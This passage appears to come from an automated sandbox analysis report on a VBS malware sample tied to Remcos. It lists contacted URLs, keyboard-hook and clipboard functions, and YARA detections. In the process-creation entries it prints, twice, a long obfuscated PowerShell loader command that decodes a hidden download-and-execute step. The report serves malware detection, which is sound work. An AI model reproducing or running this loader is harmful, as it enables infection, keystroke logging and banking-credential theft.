Source: bhvEF08.tmp.14.dr String found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
Source: powershell.exe, 00000005.00000002.2517695636.0000000006287000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.2517695636.0000000006287000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.2517695636.0000000006287000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: bhvEF08.tmp.14.dr String found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
Source: bhvEF08.tmp.14.dr String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: bhvEF08.tmp.14.dr String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5c&
Source: bhvEF08.tmp.14.dr String found in binary or memory: https://fp-afd.azureedge.net/apc/trans.gif?0684adfa5500b3bab63593997d26215c
Source: bhvEF08.tmp.14.dr String found in binary or memory: https://fp-afd.azureedge.net/apc/trans.gif?79b1312614e5ac304828ba5e1fdb4fa3
Source: bhvEF08.tmp.14.dr String found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?7ae939fc98ce1346dd2e496abdba2d3b
Source: bhvEF08.tmp.14.dr String found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?9f3db9405f1b2793ad8d8de9770248e4
Source: bhvEF08.tmp.14.dr String found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?4aec53910de6415b25f2c4faf3f7e54a
Source: bhvEF08.tmp.14.dr String found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?77290711a5e44a163ac2e666ad7b53fd
Source: bhvEF08.tmp.14.dr String found in binary or memory: https://fp.msedge.net/conf/v1/asgw/fpconfig.min.json
Source: bhvEF08.tmp.14.dr String found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
Source: powershell.exe, 00000005.00000002.2515114212.000000000537C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2570518162.000002848DF0F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: bhvEF08.tmp.14.dr String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: bhvEF08.tmp.14.dr String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: bhvEF08.tmp.14.dr String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: wab.exe String found in binary or memory: https://login.yahoo.com/config/login
Source: bhvEF08.tmp.14.dr String found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
Source: bhvEF08.tmp.14.dr String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
Source: bhvEF08.tmp.14.dr String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
Source: bhvEF08.tmp.14.dr String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
Source: powershell.exe, 00000002.00000002.2647803463.000002849CCDF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2517695636.00000000063C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2517695636.0000000006287000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: bhvEF08.tmp.14.dr String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
Source: bhvEF08.tmp.14.dr String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-06-30-24/PreSignInSettingsConfig.json?One
Source: bhvEF08.tmp.14.dr String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-06-40-12/PreSignInSettingsConfig.json
Source: bhvEF08.tmp.14.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=14d1c105224b3e736c3c
Source: bhvEF08.tmp.14.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/741e3e8c607c445262f3add0e58b18f19e0502af.xml?OneDriveUpdate=7fe112
Source: bhvEF08.tmp.14.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
Source: bhvEF08.tmp.14.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
Source: bhvEF08.tmp.14.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
Source: bhvEF08.tmp.14.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
Source: bhvEF08.tmp.14.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
Source: bhvEF08.tmp.14.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-3a99f64809c6780df035.js
Source: bhvEF08.tmp.14.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
Source: bhvEF08.tmp.14.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ac5cfbeadfd63fc27ffd.chunk.v7.js
Source: bhvEF08.tmp.14.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
Source: bhvEF08.tmp.14.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.68ab311bcca4f86f9ef5.chunk.v7.js
Source: bhvEF08.tmp.14.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.2ce72562ad7c0ae7059c.chunk.v7.js
Source: bhvEF08.tmp.14.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-ba2888a24179bf152f3d.js
Source: bhvEF08.tmp.14.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.169ce481376dceef3ef6.chunk.v7.c
Source: bhvEF08.tmp.14.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.b24d6b48aeb44c7b5bf6.chunk.v7.j
Source: bhvEF08.tmp.14.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
Source: bhvEF08.tmp.14.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
Source: bhvEF08.tmp.14.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
Source: bhvEF08.tmp.14.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
Source: bhvEF08.tmp.14.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
Source: bhvEF08.tmp.14.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
Source: bhvEF08.tmp.14.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
Source: bhvEF08.tmp.14.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
Source: bhvEF08.tmp.14.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
Source: bhvEF08.tmp.14.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
Source: bhvEF08.tmp.14.dr String found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
Source: bhvEF08.tmp.14.dr String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
Source: bhvEF08.tmp.14.dr String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
Source: bhvEF08.tmp.14.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: wab.exe, wab.exe, 00000010.00000002.2587731823.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: wab.exe String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: bhvEF08.tmp.14.dr String found in binary or memory: https://www.office.com/

Key, Mouse, Clipboard, Microphone and Screen Capturing

barindex
Source: C:\Program Files (x86)\Windows Mail\wab.exe Windows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_0041183A OpenClipboard,GetLastError,DeleteFileW, 14_2_0041183A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard, 14_2_0040987A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 14_2_004098E2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 15_2_00406DFC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard, 15_2_00406E9F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 16_2_004068B5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard, 16_2_004072B5

E-Banking Fraud

barindex
Source: Yara match File source: 0000000A.00000002.3372008001.000000000582C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3384711680.00000000210CF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3372008001.0000000005811000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wab.exe PID: 1096, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

System Summary

barindex
Source: amsi32_5512.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 3516, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5512, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 9716
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 9716
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 9716 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 9716 Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens';If (${host}.CurrentCulture) {$Fightet++;}Function fyrstendmme($aldersforskellens){$Breddesekunder=$aldersforskellens.Length-$Fightet;$Energi='SUBsTRI';$Energi+='ng';For( $standsforskellenes=7;$standsforskellenes -lt $Breddesekunder;$standsforskellenes+=8){$Unblessed+=$aldersforskellens.$Energi.Invoke( $standsforskellenes, $Fightet);}$Unblessed;}function Illish($Phagedaena){ . ($Triangularize) ($Phagedaena);}$Opholdsstuernes=fyrstendmme 'Ove,logMP sternoStudentzB,throdiBasommal,ovangslCopywria rbefol/Aphidic5Blokskr.Overvaa0Duarchy Genrefo(Reser,eWDistrusiOsm.regnSpacersdcert,fioPassiarwInterjesPeckedi NydeligNMontr cTAnticle Medinde1 Overcr0elastom.Un.erfo0Renounc; Topot. Bia ricWTrimniniJetsrunnLsdelfl6Hovmodi4forrykk;Nautica stra hsxSne ker6Cohea.t4 theop.; Prster SelvcerEntase v Undres:undecor1Fejlber2Phyllos1Martial.Konkurr0Fdevand)Yawlers AbioloGFemkroneVejrm.lckommandkBemyndio Ti skr/Vaaben.2 Relati0 Fanwr 1Flugtni0Gerning0Analyse1Udmanvr0Sidetal1Lin.les Appo,ehFCyk lbaiSamekhurcalioloeMoa lesfRester o,estselxUdsp ng/ Aandev1 asiali2Tubercl1,eperso. drydde0 Fogf,u ';$Sorteringens=fyrstendmme 'PaakrveU Antedas Sjaelaevulkankr baga e-tjenestA.nderprgMemoryleTelak cn ndtjentDesinfi ';$Bespake=fyrstendmme 'Arthrozh Lat,setLaveslat GenbrupUdnvnel:Donnish/Telefon/Gambesm1Esquire0Aktiesm3Nonrepa. Pushie2Spag um3 Entome7Simonio. digame8 cul ee6 Mistan. Ba oni2Sawneba4porella7Rodesbl/ ClenchF BoatsirOpprioreGraagaamAndenklmBetonk,eSexol glBoghvediAf.rftegAdipsybs calceit GeodifeUlcerog.ElectroxApp,ehesAf,rydsnholden ';$Deutoxide=fyrstendmme 'Valgets>Bakteri ';$Triangularize=fyrstendmme 'UdfyldniMikalaseUforkorxReprodu ';$Doozie='Medansvaret';$Bombestoppets = fyrstendmme ' ,ulbrieUl,triccUngr.sphForretnoAfrett. Pa.gene%Becifreainex,repRuelsenpCostaladCarabaoaalk,nettPja,tesaFleshbr%tidtag.\ NonmitDSystemko Lnra,mbEkstraibScraggleBudgettlparadeftCraniomrSrsynetuThiokoldClericieSecondin Do torsHamalds1Avgusta4Hildebo0A bejds.hugtandASkoleinfUnreal.fSerpent trillin&Hilsene&B ngtow P.cocureInterfrctubi,olhArtiumsoc onebr .ustulatunmetap ';Illish (fyrstendmme ' Pixm.p$GastroegTypot kl etreado Trachob Pse.doa hrynidl La.dsd:ForsnknDMimicaleAndalusb mirska,osmolat HalefieStandtirDidrach= Nati.n(Genaabnc Derre.mSteer
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens';If (${host}.CurrentCulture) {$Fightet++;}Function fyrstendmme($aldersforskellens){$Breddesekunder=$aldersforskellens.Length-$Fightet;$Energi='SUBsTRI';$Energi+='ng';For( $standsforskellenes=7;$standsforskellenes -lt $Breddesekunder;$standsforskellenes+=8){$Unblessed+=$aldersforskellens.$Energi.Invoke( $standsforskellenes, $Fightet);}$Unblessed;}function Illish($Phagedaena){ . ($Triangularize) ($Phagedaena);}$Opholdsstuernes=fyrstendmme 'Ove,logMP sternoStudentzB,throdiBasommal,ovangslCopywria rbefol/Aphidic5Blokskr.Overvaa0Duarchy Genrefo(Reser,eWDistrusiOsm.regnSpacersdcert,fioPassiarwInterjesPeckedi NydeligNMontr cTAnticle Medinde1 Overcr0elastom.Un.erfo0Renounc; Topot. Bia ricWTrimniniJetsrunnLsdelfl6Hovmodi4forrykk;Nautica stra hsxSne ker6Cohea.t4 theop.; Prster SelvcerEntase v Undres:undecor1Fejlber2Phyllos1Martial.Konkurr0Fdevand)Yawlers AbioloGFemkroneVejrm.lckommandkBemyndio Ti skr/Vaaben.2 Relati0 Fanwr 1Flugtni0Gerning0Analyse1Udmanvr0Sidetal1Lin.les Appo,ehFCyk lbaiSamekhurcalioloeMoa lesfRester o,estselxUdsp ng/ Aandev1 asiali2Tubercl1,eperso. drydde0 Fogf,u ';$Sorteringens=fyrstendmme 'PaakrveU Antedas Sjaelaevulkankr baga e-tjenestA.nderprgMemoryleTelak cn ndtjentDesinfi ';$Bespake=fyrstendmme 'Arthrozh Lat,setLaveslat GenbrupUdnvnel:Donnish/Telefon/Gambesm1Esquire0Aktiesm3Nonrepa. Pushie2Spag um3 Entome7Simonio. digame8 cul ee6 Mistan. Ba oni2Sawneba4porella7Rodesbl/ ClenchF BoatsirOpprioreGraagaamAndenklmBetonk,eSexol glBoghvediAf.rftegAdipsybs calceit GeodifeUlcerog.ElectroxApp,ehesAf,rydsnholden ';$Deutoxide=fyrstendmme 'Valgets>Bakteri ';$Triangularize=fyrstendmme 'UdfyldniMikalaseUforkorxReprodu ';$Doozie='Medansvaret';$Bombestoppets = fyrstendmme ' ,ulbrieUl,triccUngr.sphForretnoAfrett. Pa.gene%Becifreainex,repRuelsenpCostaladCarabaoaalk,nettPja,tesaFleshbr%tidtag.\ NonmitDSystemko Lnra,mbEkstraibScraggleBudgettlparadeftCraniomrSrsynetuThiokoldClericieSecondin Do torsHamalds1Avgusta4Hildebo0A bejds.hugtandASkoleinfUnreal.fSerpent trillin&Hilsene&B ngtow P.cocureInterfrctubi,olhArtiumsoc onebr .ustulatunmetap ';Illish (fyrstendmme ' Pixm.p$GastroegTypot kl etreado Trachob Pse.doa hrynidl La.dsd:ForsnknDMimicaleAndalusb mirska,osmolat HalefieStandtirDidrach= Nati.n(Genaabnc Derre.mSteer Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process Stats: CPU usage > 49%
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 14_2_0040DD85
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00401806 NtdllDefWindowProc_W, 14_2_00401806
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_004018C0 NtdllDefWindowProc_W, 14_2_004018C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_004016FD NtdllDefWindowProc_A, 15_2_004016FD
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_004017B7 NtdllDefWindowProc_A, 15_2_004017B7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00402CAC NtdllDefWindowProc_A, 16_2_00402CAC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00402D66 NtdllDefWindowProc_A, 16_2_00402D66
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD346FB0F6 2_2_00007FFD346FB0F6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD346F4A0A 2_2_00007FFD346F4A0A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD346FBEA2 2_2_00007FFD346FBEA2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD346F44E0 2_2_00007FFD346F44E0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD346F3E33 2_2_00007FFD346F3E33
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD346F16C9 2_2_00007FFD346F16C9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD346F6E6D 2_2_00007FFD346F6E6D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD346F7AFA 2_2_00007FFD346F7AFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD346F6BF3 2_2_00007FFD346F6BF3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD347C088D 2_2_00007FFD347C088D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_04EAF1F0 5_2_04EAF1F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_04EAFAC0 5_2_04EAFAC0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_04EAEEA8 5_2_04EAEEA8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_21377194 10_2_21377194
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_2136B5C1 10_2_2136B5C1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_0044B040 14_2_0044B040
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_0043610D 14_2_0043610D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00447310 14_2_00447310
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_0044A490 14_2_0044A490
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_0040755A 14_2_0040755A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_0043C560 14_2_0043C560
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_0044B610 14_2_0044B610
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_0044D6C0 14_2_0044D6C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_004476F0 14_2_004476F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_0044B870 14_2_0044B870
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_0044081D 14_2_0044081D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00414957 14_2_00414957
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_004079EE 14_2_004079EE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00407AEB 14_2_00407AEB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_0044AA80 14_2_0044AA80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00412AA9 14_2_00412AA9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00404B74 14_2_00404B74
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00404B03 14_2_00404B03
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_0044BBD8 14_2_0044BBD8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00404BE5 14_2_00404BE5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00404C76 14_2_00404C76
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00415CFE 14_2_00415CFE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00416D72 14_2_00416D72
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00446D30 14_2_00446D30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00446D8B 14_2_00446D8B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00406E8F 14_2_00406E8F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_00405038 15_2_00405038
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_0041208C 15_2_0041208C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_004050A9 15_2_004050A9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_0040511A 15_2_0040511A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_0043C13A 15_2_0043C13A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_004051AB 15_2_004051AB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_00449300 15_2_00449300
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_0040D322 15_2_0040D322
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_0044A4F0 15_2_0044A4F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_0043A5AB 15_2_0043A5AB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_00413631 15_2_00413631
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_00446690 15_2_00446690
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_0044A730 15_2_0044A730
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_004398D8 15_2_004398D8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_004498E0 15_2_004498E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_0044A886 15_2_0044A886
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_0043DA09 15_2_0043DA09
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_00438D5E 15_2_00438D5E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_00449ED0 15_2_00449ED0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_0041FE83 15_2_0041FE83
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_00430F54 15_2_00430F54
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_004050C2 16_2_004050C2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_004014AB 16_2_004014AB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00405133 16_2_00405133
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_004051A4 16_2_004051A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00401246 16_2_00401246
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0040CA46 16_2_0040CA46
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00405235 16_2_00405235
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_004032C8 16_2_004032C8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00401689 16_2_00401689
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00402F60 16_2_00402F60
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 004169A7 appears 87 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 0044DB70 appears 41 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 004165FF appears 35 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 00422297 appears 42 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 00444B5A appears 37 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 00413025 appears 79 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 00416760 appears 69 times
Source: SOA.vbs Initial sample: Strings found which are bigger than 50
Source: amsi32_5512.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 3516, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5512, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.phis.troj.spyw.expl.evad.winVBS@19/14@1/3
